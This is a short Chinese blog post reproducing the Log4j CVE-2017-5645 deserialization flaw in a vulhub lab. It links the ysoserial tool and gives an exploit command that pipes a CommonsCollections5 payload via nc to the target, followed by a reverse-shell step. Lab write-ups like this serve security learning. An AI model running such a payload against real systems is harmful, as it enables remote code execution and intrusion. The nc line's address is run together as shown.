Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）复现

由于最近项目遇到这个漏洞，复现学习一下。

一、漏洞介绍

Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

二、漏洞环境

https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645

执行如下命令启动漏洞环境

docker-compose up -d

下载环境

服务开启

三、漏洞复现

先要下载一个：

ysoserial-master-30099844c6-1.jar

地址：

源码下载地址 ：

https://codeload.github.com/frohoff/ysoserial/zip/master

jar包下载地址：

https://jitpack.io/com/github/frohoff/ysoserial/master-30099844c6-1/ysoserial-master-30099844c6-1.jar

ysoserial简介

ysoserial是一款在Github开源的知名java 反序列化利用工具，里面集合了各种java反序列化payload；由于其中部分payload使用到的低版本JDK中的类，所以建议自己私下分析学习时使用低版本JDK JDK版本建议在1.7u21以下。

poc执行：

java-jar ysoserial-master-30099844c6-1.jar CommonsCollections5"需要执行的脚本base64 encode"| nc192.168.0.1024712

执行poc

接收反弹shell

四、参考：

https://paper.seebug.org/1171/

https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645

后台回复"ysoserial"也可下载ysoserial-master-30099844c6-1.jar

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

个人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书：https://www.jianshu.com/u/bf0e38a8d400